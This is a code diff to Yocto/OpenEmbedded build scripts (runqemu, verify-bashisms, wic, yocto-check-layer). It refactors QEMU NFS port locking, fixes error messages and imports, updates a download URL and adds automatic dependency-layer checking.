index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
764 raise RunQemuError('BIOS not found: %s' % bios_match_name) 764 raise RunQemuError('BIOS not found: %s' % bios_match_name)
765 765
766 if not os.path.exists(self.bios): 766 if not os.path.exists(self.bios):
767 raise RunQemuError("KERNEL %s not found" % self.bios) 767 raise RunQemuError("BIOS %s not found" % self.bios)
768 768
769 769
770 def check_mem(self): 770 def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
974 else: 974 else:
975 self.nfs_server = '192.168.7.1' 975 self.nfs_server = '192.168.7.1'
976 976
977 # Figure out a new nfs_instance to allow multiple qemus running. 977 nfsd_port = 3048 + self.nfs_instance
978 ps = subprocess.check_output(("ps", "auxww")).decode('utf-8') 978 lockdir = "/tmp/qemu-port-locks"
979 pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) ' 979 self.make_lock_dir(lockdir)
980 all_instances = re.findall(pattern, ps, re.M) 980 while not self.check_free_port('localhost', nfsd_port, lockdir):
981 if all_instances: 981 self.nfs_instance += 1
982 all_instances.sort(key=int) 982 nfsd_port += 1
983 self.nfs_instance = int(all_instances.pop()) + 1
984
985 nfsd_port = 3049 + 2 * self.nfs_instance
986 mountd_port = 3048 + 2 * self.nfs_instance
987 983
984 mountd_port = nfsd_port
988 # Export vars for runqemu-export-rootfs 985 # Export vars for runqemu-export-rootfs
989 export_dict = { 986 export_dict = {
990 'NFS_INSTANCE': self.nfs_instance, 987 'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
1034 self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % ( 1031 self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
1035 self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper'))) 1032 self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
1036 1033
1034 def make_lock_dir(self, lockdir):
1035 if not os.path.exists(lockdir):
1036 # There might be a race issue when multi runqemu processess are
1037 # running at the same time.
1038 try:
1039 os.mkdir(lockdir)
1040 os.chmod(lockdir, 0o777)
1041 except FileExistsError:
1042 pass
1043 return
1044
1037 def setup_slirp(self): 1045 def setup_slirp(self):
1038 """Setup user networking""" 1046 """Setup user networking"""
1039 1047
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
1052 mac = 2 1060 mac = 2
1053 1061
1054 lockdir = "/tmp/qemu-port-locks" 1062 lockdir = "/tmp/qemu-port-locks"
1055 if not os.path.exists(lockdir): 1063 self.make_lock_dir(lockdir)
1056 # There might be a race issue when multi runqemu processess are
1057 # running at the same time.
1058 try:
1059 os.mkdir(lockdir)
1060 os.chmod(lockdir, 0o777)
1061 except FileExistsError:
1062 pass
1063 1064
1064 # Find a free port to avoid conflicts 1065 # Find a free port to avoid conflicts
1065 for p in ports[:]: 1066 for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
1099 logger.error("ip: %s" % ip) 1100 logger.error("ip: %s" % ip)
1100 raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found") 1101 raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
1101 1102
1102 if not os.path.exists(lockdir): 1103 self.make_lock_dir(lockdir)
1103 # There might be a race issue when multi runqemu processess are
1104 # running at the same time.
1105 try:
1106 os.mkdir(lockdir)
1107 os.chmod(lockdir, 0o777)
1108 except FileExistsError:
1109 pass
1110 1104
1111 cmd = (ip, 'link') 1105 cmd = (ip, 'link')
1112 logger.debug('Running %s...' % str(cmd)) 1106 logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
1328 1322
1329 for ovmf in self.ovmf_bios: 1323 for ovmf in self.ovmf_bios:
1330 format = ovmf.rsplit('.', 1)[-1] 1324 format = ovmf.rsplit('.', 1)[-1]
1325 if format == "bin":
1326 format = "raw"
1331 self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf) 1327 self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
1332 1328
1333 self.qemu_opt += ' ' + self.qemu_opt_script 1329 self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
1421 logger.debug('Running %s' % str(cmd)) 1417 logger.debug('Running %s' % str(cmd))
1422 subprocess.check_call(cmd) 1418 subprocess.check_call(cmd)
1423 self.release_taplock() 1419 self.release_taplock()
1424 self.release_portlock()
1425 1420
1426 if self.nfs_running: 1421 if self.nfs_running:
1427 logger.info("Shutting down the userspace NFS server...") 1422 logger.info("Shutting down the userspace NFS server...")
1428 cmd = ("runqemu-export-rootfs", "stop", self.rootfs) 1423 cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
1429 logger.debug('Running %s' % str(cmd)) 1424 logger.debug('Running %s' % str(cmd))
1430 subprocess.check_call(cmd) 1425 subprocess.check_call(cmd)
1426 self.release_portlock()
1431 1427
1432 if self.saved_stty: 1428 if self.saved_stty:
1433 subprocess.check_call(("stty", self.saved_stty)) 1429 subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
1514 1510
1515 def sigterm_handler(signum, frame): 1511 def sigterm_handler(signum, frame):
1516 logger.info("SIGTERM received") 1512 logger.info("SIGTERM received")
1517 os.kill(config.qemupid, signal.SIGTERM) 1513 if config.qemupid:
1514 os.kill(config.qemupid, signal.SIGTERM)
1518 config.cleanup() 1515 config.cleanup()
1519 # Deliberately ignore the return code of 'tput smam'. 1516 # Deliberately ignore the return code of 'tput smam'.
1520 subprocess.call(["tput", "smam"]) 1517 subprocess.call(["tput", "smam"])
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
100 args = parser.parse_args() 100 args = parser.parse_args()
101 101
102 if shutil.which("checkbashisms.pl") is None: 102 if shutil.which("checkbashisms.pl") is None:
103 print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl") 103 print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
104 sys.exit(1) 104 sys.exit(1)
105 105
106 # The order of defining the worker function, 106 # The order of defining the worker function,
diff --git a/scripts/wic b/scripts/wic
index a741aed364..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
22import argparse 22import argparse
23import logging 23import logging
24import subprocess 24import subprocess
25import shutil
25 26
26from collections import namedtuple 27from collections import namedtuple
27from distutils import spawn
28 28
29# External modules 29# External modules
30scripts_path = os.path.dirname(os.path.realpath(__file__)) 30scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
47 break 47 break
48 sdkroot = os.path.dirname(sdkroot) 48 sdkroot = os.path.dirname(sdkroot)
49 49
50bitbake_exe = spawn.find_executable('bitbake') 50bitbake_exe = shutil.which('bitbake')
51if bitbake_exe: 51if bitbake_exe:
52 bitbake_path = scriptpath.add_bitbake_lib_path() 52 bitbake_path = scriptpath.add_bitbake_lib_path()
53 import bb 53 import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
206 logger.info(" (Please check that the build artifacts for the machine") 206 logger.info(" (Please check that the build artifacts for the machine")
207 logger.info(" selected in local.conf actually exist and that they") 207 logger.info(" selected in local.conf actually exist and that they")
208 logger.info(" are the correct artifacts for the image (.wks file)).\n") 208 logger.info(" are the correct artifacts for the image (.wks file)).\n")
209 raise WicError("The artifact that couldn't be found was %s:\n %s", not_found, not_found_dir) 209 raise WicError("The artifact that couldn't be found was %s:\n %s" % (not_found, not_found_dir))
210 210
211 krootfs_dir = options.rootfs_dir 211 krootfs_dir = options.rootfs_dir
212 if krootfs_dir is None: 212 if krootfs_dir is None:
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
24scriptpath.add_oe_lib_path() 24scriptpath.add_oe_lib_path()
25scriptpath.add_bitbake_lib_path() 25scriptpath.add_bitbake_lib_path()
26 26
27from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers 27from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
28from oeqa.utils.commands import get_bb_vars 28from oeqa.utils.commands import get_bb_vars
29 29
30PROGNAME = 'yocto-check-layer' 30PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
51 help='File to output log (optional)', action='store') 51 help='File to output log (optional)', action='store')
52 parser.add_argument('--dependency', nargs="+", 52 parser.add_argument('--dependency', nargs="+",
53 help='Layers to process for dependencies', action='store') 53 help='Layers to process for dependencies', action='store')
54 parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
55 action='store_true')
54 parser.add_argument('--machines', nargs="+", 56 parser.add_argument('--machines', nargs="+",
55 help='List of MACHINEs to be used during testing', action='store') 57 help='List of MACHINEs to be used during testing', action='store')
56 parser.add_argument('--additional-layers', nargs="+", 58 parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
121 if not layers: 123 if not layers:
122 return 1 124 return 1
123 125
126 # Find all dependencies, and get them checked too
127 if not args.no_auto_dependency:
128 depends = []
129 for layer in layers:
130 layer_depends = get_layer_dependencies(layer, dep_layers, logger)
131 if layer_depends:
132 for d in layer_depends:
133 if d not in depends:
134 depends.append(d)
135
136 for d in depends:
137 if d not in layers:
138 logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
139 layers.append(d)
140
124 shutil.copyfile(bblayersconf, bblayersconf + '.backup') 141 shutil.copyfile(bblayersconf, bblayersconf + '.backup')
125 def cleanup_bblayers(signum, frame): 142 def cleanup_bblayers(signum, frame):
126 shutil.copyfile(bblayersconf + '.backup', bblayersconf) 143 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
138 layer['type'] == LayerType.ERROR_BSP_DISTRO: 155 layer['type'] == LayerType.ERROR_BSP_DISTRO:
139 continue 156 continue
140 157
158 # Reset to a clean backup copy for each run
159 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
160
141 if check_bblayers(bblayersconf, layer['path'], logger): 161 if check_bblayers(bblayersconf, layer['path'], logger):
142 logger.info("%s already in %s. To capture initial signatures, layer under test should not present " 162 logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
143 "in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name'])) 163 "in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
149 logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'], 169 logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
150 layer['path'])) 170 layer['path']))
151 171
152 shutil.copyfile(bblayersconf + '.backup', bblayersconf)
153
154 missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) 172 missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
155 if not missing_dependencies: 173 if not missing_dependencies:
156 for additional_layer in additional_layers: 174 for additional_layer in additional_layers:
157 if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger): 175 if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
158 missing_dependencies = True 176 missing_dependencies = True
159 break 177 break
160 if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \ 178 if missing_dependencies:
161 any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
162 additional_layers)):
163 logger.info('Skipping %s due to missing dependencies.' % layer['name']) 179 logger.info('Skipping %s due to missing dependencies.' % layer['name'])
164 results[layer['name']] = None 180 results[layer['name']] = None
165 results_status[layer['name']] = 'SKIPPED (Missing dependencies)' 181 results_status[layer['name']] = 'SKIPPED (Missing dependencies)'